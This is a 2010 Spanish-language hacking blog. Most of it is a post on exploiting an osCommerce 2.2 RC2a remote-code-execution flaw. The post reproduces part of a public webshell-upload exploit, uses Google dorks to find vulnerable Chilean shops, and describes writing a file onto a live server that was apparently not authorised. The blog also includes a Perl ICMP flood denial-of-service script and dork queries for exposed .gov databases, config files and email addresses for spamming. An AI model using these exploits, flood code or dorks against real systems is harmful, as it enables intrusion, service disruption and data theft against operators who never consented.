The Pentester

martes, 18 de mayo de 2010

Oscommerce Hacking Live

En este post mostrare como explotar una vulnerabilidad en Oscommerce 2.2rc (maybe another versions too).

La vulnerabilidad que usare ya es muy conocida es un RCE* exploit, pero en este caso no utilizare el exploit, tratare de hacerlo manualmente ;)

El source code lo encontramos en milw0rm.com
http://www.milw0rm.com/exploits/9556
";
$message="POST ".$path.$admin_path."file_manager.php/login.php?action=save HTTP/1.1\r\n";
$message.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$message.="Accept-Language: zh-cn\r\n";
$message.="Content-Type: application/x-www-form-urlencoded\r\n";
$message.="Accept-Encoding: gzip, deflate\r\n";
$message.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$message.="Host: $host\r\n";
$message.="Content-Length: ".strlen($shellcode)."\r\n";
$message.="Connection: Close\r\n\r\n";
$message.=$shellcode;
$fd = fsockopen($host,'80');
if(!$fd)
{
echo '[~]No response from'.$host;
die;
}
fputs($fd,$message);
echo ("[+]Go to see U webshell : $host/fly.php");
?>


# milw0rm.com [2009-08-31]


Pero como mencionaba antes solo no usare este exploit, en resumen el fallo consiste en una ejecucion remota de archivos, la que nos permite crear un archivo arbitrario.
Buscando Servidores Vulnerables:

Como ya sabemos goOglear buscaremos el cms afectado.

"site:.cl" + "powered by oscommerce" "2009 -2010" Página 3 de aproximadamente 40,700 resultados (0.27 segundos)

Ubicamos un server vulnerable a osCommerce Online Merchant v2.2 RC2a





Ahora si estamos en windows podriamos usar Telnet para hacer una coneccion entre la web y nosotros, en este caso usare algo mas practico Burp Suite, es un framework muy completo para hacer audicion, pentesting etc, en este caso solo usare la version gratuita que se puede descargar desde su web:
http://portswigger.net/suite/download2.html





usando los mismos parametros del exploit rce eh creado un archivo .php sin ninguna restriccion en el cual puse un simple comando para mostrar el php.ini y mostrar informacion relevante del servidor, un atacante mal intencionado podria ejecutar codigo arbitrariamente y obetener acceso al sistema mediante una php-shell.

Windows Vista Ddos exploit POC

#!/usr/bin/perl
use Net::RawIP;
my $saddr = shift || '1.3.3.7';
my $daddr = shift || '192.168.0.255';
my $fragment = 0x0;
print "[~] Initializing ICMP Null-Flood DoS.\n";
while($fragment<0xffff){ icmp =" new" icmp ="">{}});
$icmp->set({
ip => {
saddr => $saddr,
daddr => $daddr,
ttl => 0xFF,
tot_len => 0x0
},
icmp => {
type => 0x8,
code => 0x0,
sequence => $fragment,
data => 'A'
}
});
$icmp->send(0x0,0x1);
$fragment++;
}
my $ping=`ping -c 1 -l 1000 $daddr`;
if($ping=~/0 received/){
print "[!] (Null-Flood) success!\n";
}else{
print "[x] (Null-Flood) failed.\n";
}

lunes, 17 de mayo de 2010

Google - Desnudando la Red



Son las 4.10 am, reviso logs de mi servidor y se me ocurrio usar google como ayuda para realizar "busquedas", dentro de mi propio servidor, esto no tiene nada de raro ya que google es un motor de busqueda y sus parametros ayudan a realizar una busquedas mas aguda...

Quizas muchos solo se limitan a usar google de la forma comun, buscar algun archivo mp3, algun trabajo o tutorial y se limitan a usar "''", "+","-"
Google cuenta con Operadores de busqueda que ayudan a tener una mejor performance de resultados.

inurl: allinurl: site: title: allintitle: link: cache: info:
Son los principales y mas relevantes a mi parecer aunque existen muchos mas, un explicacion rapida.

Inurl: Este operador buscara en las urls.
ex.
inurl:one_love.mp3
Buscara todas las urls que contengan one_love.mp3

Allinurl: Este operador buscar en TODAS las urls.
ex.
allinurl:One_love.mp3 +Complete+Albumn
Buscara todas las urls, (parecida a la anterior pero la busqueda sera mas profunda).

Site: Este operador buscara "sites" o sitios web con el dominio que nosotros indiquemos.
ex.
site:.com.mx site:.co.uk site:.com.pe
Buscara los dominios listados, podemos ubicar todo tipo de dominios.

Title: Este operador buscara sitios webs con el titulo proporcionado.
ex.
title:"Admin - Login" title:"index.of" + ftp_log (just for phun) Buscara en los titulos de las paginas.

Allintitle: Este operador nos muestra TODOS los resultados mostrados en el titulo.
ex.
allintitle:"user@ftp" + filetype:ini
allintitle:""Microsoft OLE DB Provider for SQL Server error"

Link: Este operador nos mostrara los links que tiene una determinada pagina.
ex.
link:comersus.mdb? lul

Cache: Muestra la cache de una pagina almacenada en google no el contenida actual, si no el contenido que almaceno google en algun determinado momento.

Info: Este operador mostrara informacion sobre una pagina web.



Get Phun(then).

Busquedas Avanzadas.

Como busqueda avanzada catalogamos a la informacion relevante que podemos encontrar gracias a nuestro amigo google, por ejemplo.

Un spammer podria encontrar muy emocionante realizar una busqueda como,
http://www.google.com.pe/search?hl=es&q=site%3Agov+aol.com&meta=&aq=f&aqi=&aql=&oq=&gs_rfai=
Resultados 1 - 10 de aproximadamente 1,100,000 de site:gov aol.com. (0.10 segundos)

Miles de emails con el dominio de aol.com, podria usarse @hotmail.com, @yahoo.com y un largo etc...

Informacion relevante

Busca bajo tu propio riesgo las paginas web listadas son .gov y estan protegidas por las leyes de su pais, este es solo un proof of concept o prueba de concepto para comprender lo que podriamos encontrar con una simple busqueda, no utilizare operadores avanzados ni cadenas o meta-tags solo los operadores antes mencionados.


http://www.google.com.pe/search?hl=es&q=site%3Agov+filetype%3Aini&meta=&aq=f&aqi=&aql=&oq=&gs_rfai=

http://www.google.com.pe/search?hl=es&q=site%3Agov+intitle%3A%22index.of%22+ftp&meta=&aq=f&aqi=&aql=&oq=&gs_rfai=

http://www.google.com.pe/search?hl=es&q=site%3Agov+intitle%3A%22index.of%22+.mdb&meta=&aq=f&aqi=&aql=&oq=&gs_rfai=


Buscando Bases de datos.

http://www.google.com.pe/search?hl=es&q=site%3Agov+intitle%3A%22index.of%22+.sql&meta=&aq=f&aqi=&aql=&oq=&gs_rfai=

http://www.google.com.pe/search?hl=es&q=site%3Agov+%22Microsoft+OLE+DB+Provider+for+SQL+Server+error+%22&meta=&aq=f&aqi=&aql=&oq=&gs_rfai=

Creo que ya amanece y si pongo mas imagenes me censuran el blog...

martes, 11 de mayo de 2010

S.H.E.N-PROJECT -Spanish -Mode

Security Hackers Exploiting Systems. (S.H.E.N.)
"Proyecto Informatico Basado en licensias GNU-OSSTMM"


Nace con el propocito de brindar seguridad informatica en tiempo real.

S.H.E.N
Es un Proyecto Informatico, orientando a Webmasters, Programadores, Operadores de Systema, Pentesters, y a todo interezado en el tema de la seguridad en Internet.
Overview
Debido al aumento constante de vulnerabilidades, 0days, local exploits etc. El numero de servidores afectados en el mundo cresce constantemente se habla de millones de pc "Zombies", infectadas para trabajar en las "Botnets". URLs maliciosas robado informacion con solo un click, en medio de todo este caos el equilibrio debe llegar.
El Objetivo de nuestro proyecto es mantener "Informacion" segura, para ello contamos con especialistas IT de gran nivel, revisando constantemente las ultimas noticias de la net.
Orientando a webmasters y/o Administradores de Sistema, para mantener su web y su "Informacion" segura.

Metodologia.
S.H.E.N - Scanner
Este metodo scanea sistemas "vulnerables", Ejecuta un *POC(prueba del concepto), y notifica al webmaster, administrador de red, compañia, etc.
*Las Vulnerabilidades a scanear seran publicas(explots,0days, Bof.)

S.H.E.N - Country
Este metodo busca mantener el nivel de seguridad de TU pais actualizado, Analizando las principales websites de TU pais para notificar fallo alguno, de encontrarse alguna vulnerabilidad esta SOLO sera explotable de contar con el consentimiento y/o PREVIO reporte a los encargados del sistema afectado.

S.H.E.N - WWW
Este metodo esta orientado a todos los recursos encontrados en internet, Social Networking, Software related. Reporte de Pornografia Infantil, Webs degradantes, etc.








sábado, 8 de mayo de 2010